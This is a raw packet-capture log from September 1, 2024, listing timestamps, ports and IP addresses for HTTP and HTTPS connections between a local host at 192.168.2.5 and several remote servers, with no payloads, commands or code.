Sep 1, 2024 06:28:05.667128086 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667228937 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667239904 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667249918 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667258978 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667263985 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667268991 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667279005 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667289019 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667289019 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667299032 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667314053 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667330027 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667634010 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667644978 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667680025 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667777061 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667788029 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667798042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667814970 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667838097 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667846918 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667924881 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667936087 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667946100 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667963028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667968035 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667973995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667983055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.667989016 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.667994022 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.668003082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.668013096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.668014050 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.668040037 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.668049097 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.676467896 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676486015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676496983 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676517010 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.676534891 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.676619053 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676630020 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676664114 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.676764011 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676774979 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676784992 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.676808119 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.676819086 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.677073956 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677083969 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677093029 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677103996 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677113056 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677119017 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.677123070 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677133083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677136898 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.677143097 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677153111 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677161932 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677162886 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.677172899 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.677180052 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.677201033 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.677225113 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.678462029 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678499937 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.678656101 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678667068 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678677082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678687096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678695917 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678700924 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.678706884 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.678708076 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678718090 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678728104 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678735971 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.678738117 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.678752899 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.678771973 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.722700119 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.722912073 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.722923040 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.722949982 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.722959995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.722971916 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.722980022 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.722980976 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.722994089 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.723001003 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.723006010 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.723031044 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.723042965 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.723112106 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.723162889 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724446058 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724495888 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724515915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724526882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724555969 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724570990 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724628925 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724639893 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724651098 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724663019 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724669933 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724701881 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724870920 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724879980 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724916935 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724931002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724944115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.724967957 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.724989891 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.725085974 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.725097895 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.725107908 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.725117922 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.725128889 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.725152016 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.725734949 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.725778103 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.725867033 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.725910902 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:06.528599977 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:06.528906107 CEST	49706	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:06.534151077 CEST	80	49706	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:06.534224987 CEST	49706	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:06.536539078 CEST	80	49704	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:06.536587954 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:06.575423002 CEST	49706	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:06.580542088 CEST	80	49706	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:07.298969984 CEST	80	49706	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:07.299173117 CEST	49706	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:07.300559044 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:07.300832033 CEST	49707	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:07.307200909 CEST	80	49707	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:07.307212114 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:07.307318926 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:07.307507992 CEST	49707	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:07.307507992 CEST	49707	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:07.314515114 CEST	80	49707	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:08.068414927 CEST	80	49707	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:08.068666935 CEST	49707	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:08.712846041 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:08.790868044 CEST	49706	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:08.791116953 CEST	49709	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:08.814681053 CEST	80	49708	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:08.814811945 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:08.814910889 CEST	80	49709	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:08.814960957 CEST	49709	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:08.815037966 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:08.815078974 CEST	80	49706	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:08.815149069 CEST	49706	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:08.815205097 CEST	49709	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:08.820148945 CEST	80	49708	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:08.820177078 CEST	80	49709	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:09.317217112 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:09.317260981 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:09.317317009 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:09.319701910 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:09.319713116 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:09.581002951 CEST	80	49709	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:09.582629919 CEST	49709	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:09.588017941 CEST	80	49708	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:09.590610027 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:09.801177979 CEST	49707	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:09.801440001 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:09.804523945 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:09.977358103 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:09.977428913 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:09.977933884 CEST	80	49708	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:09.977946043 CEST	80	49707	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:09.977999926 CEST	49707	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.012506962 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.017370939 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.097210884 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:10.097275019 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:10.099754095 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:10.099761009 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:10.100040913 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:10.149646997 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:10.229496002 CEST	80	49708	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:10.229552984 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:10.743386984 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743434906 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743443966 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743479967 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743633032 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743674994 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743721008 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743731976 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743772984 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743798018 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743808031 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743817091 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743827105 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743837118 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743860006 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743871927 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.743936062 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.743968964 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.753453016 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.753498077 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.754023075 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.754060030 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.754404068 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.754415035 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.754446030 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.754461050 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.908106089 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908138990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908149958 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908257961 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908268929 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908278942 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908289909 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908305883 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.908353090 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.908667088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.908745050 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.914799929 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.914865017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.914875984 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.914896011 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.914912939 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.914943933 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.915005922 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.915018082 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.915050983 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.915069103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.915426970 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.915494919 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.915524960 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.915535927 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.915563107 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.915582895 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.915615082 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.915956974 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.916042089 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.916075945 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.916086912 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.916111946 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.916125059 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.916136980 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.916205883 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.916205883 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.916971922 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.917033911 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:10.917114019 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.917124033 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:10.917175055 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.056763887 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.056792021 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.056797028 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.056863070 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.056894064 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.057003021 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.057051897 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.057130098 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.057173967 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.057188034 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.057255983 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.057398081 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.057408094 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.057420015 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.057456017 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.057456017 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058018923 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058037043 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058048010 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058072090 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058108091 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058249950 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058259964 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058316946 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058316946 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058736086 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058809042 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058830976 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058849096 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.058887959 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.058887959 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.063393116 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063467026 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.063549042 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063558102 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063604116 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.063611031 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063621998 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063673973 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.063684940 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.063770056 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063780069 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063790083 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.063827038 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.063848972 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.064512014 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.064580917 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.064615011 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.064686060 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.064688921 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.064698935 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.064709902 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.064740896 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.064740896 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.064763069 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.064814091 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.065363884 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.065388918 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.065398932 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.065413952 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.065421104 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.065453053 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.065634966 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.065644979 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.065656900 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.065682888 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.065699100 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.066265106 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.066323042 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.066349983 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.066360950 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.066401958 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.066401958 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.066524029 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.066534996 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.066545010 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.066592932 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.066592932 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.067302942 CEST	80	49711	185.215.113.16	192.168.2.5
